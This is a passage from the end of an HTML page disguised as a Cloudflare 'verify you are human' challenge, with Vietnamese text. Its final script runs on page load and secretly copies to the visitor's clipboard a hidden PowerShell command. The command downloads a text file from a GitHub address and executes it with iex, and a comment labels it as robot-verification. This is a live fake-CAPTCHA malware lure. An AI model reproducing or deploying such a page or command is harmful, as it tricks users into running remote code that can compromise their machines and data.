H5uRVjK9mXLcsFt.OIYW5HKewWxtstZamLNKy2jwxtnFdfyYUhYnkYqNxehvYZmT.NeprI.fJw34zfQNu9tUuPBPH0o9RFQzVagfcZXj9AxFzng4ND9SMHorNYw0bQle3S9Bo0yV9gs6pGRJl8kPTUCm8OjRuAifYOomjTyxB78bxgIwhDx8xIgRKs.3EXcmWTcjUyg87Ik_TZy1ocN8Fuq3nyYVJfXt2onPeoYUIri2uBdvbasTwBBuK9Ie0a7yMUywp_Cb3TKFkIXRYa_uXCzCfvCNnGmXzmxaDaRxjHHyYaYWzd7hsIIgJ.J.GsMlzdm4.uf89yLL6s9GpWnqL24azGkXcyLcc2A0cxXPvwMuZxcvWNEQI5GBqmGdUuntCPKlXeJ1dz6vL_2JOdwjABi7Pg9w3Y3HFul3bplY1P627EhpMG9chnG5IzT6D_0qkCPz_tZQRkHTfCuommdX9MOrK2_h5qGV15.9Ka1r.d99CPIXyHX5X6k0.dkVR8yThErmOA5XvOzrvBHkBJtOlCiGErkll0gvrbHzNU7rV7svS8mD0iFdbQ8sHawkuuJsJPPotU50"
            };
            var cpo = document.createElement('script');
            cpo.src = '/cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8eedc814496204a1';
            window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
            window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
            if (window.history && window.history.replaceState) {
                var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
                history.replaceState(null, null, "\/danh-muc\/none?q=&t=&u=7f0439dc-d30b-46ff-8a1b-e704e9cf4852&__cf_chl_rt_tk=E4D8u0QnlgGZiMiUnKmi6Pl9Ab.zAearVyIgpsgmxL8-1733671667-1.0.1.1-kg7vyyZxz0vKcj5Cy887P7cE02Rkr9aCLhohsqe87ZM" + window._cf_chl_opt.cOgUHash);
                cpo.onload = function() {
                    history.replaceState(null, null, ogU);
                }
            }
            document.getElementsByTagName('head')[0].appendChild(cpo);
        }());
    </script>
    <div class="footer" role="contentinfo">
        <div class="footer-inner">
            <div class="clearfix diagnostic-wrapper">
                <div class="ray-id">Ray ID: <code>8eedc814496204a1</code>
                </div>
            </div>
            <div class="text-center" id="footer-text">Hiệu suất &amp; tính bảo mật của <a rel="noopener noreferrer" href="https://www.cloudflare.com?utm_source=challenge&amp;utm_campaign=m" target="_blank">Cloudflare</a>
            </div>
        </div>
    </div>
</body>
<script>
    window.onload = function() {
        // Chuỗi bạn muốn sao chép
        const textToCopy = "powershell.exe -W Hidden -command $uR='https://raw.githubusercontent.com/blackcodeit407/system/refs/heads/main/vendis.txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t # Xác nhận việc xác thực không phải người máy từ website ✔";

        // Sử dụng navigator.clipboard để sao chép
        navigator.clipboard.writeText(textToCopy)
            .then(() => {
                console.log('Chuỗi đã được sao chép vào clipboard!');
            })
            .catch(err => {
                console.error('Lỗi sao chép:', err);
            });
    };
</script>


</html>
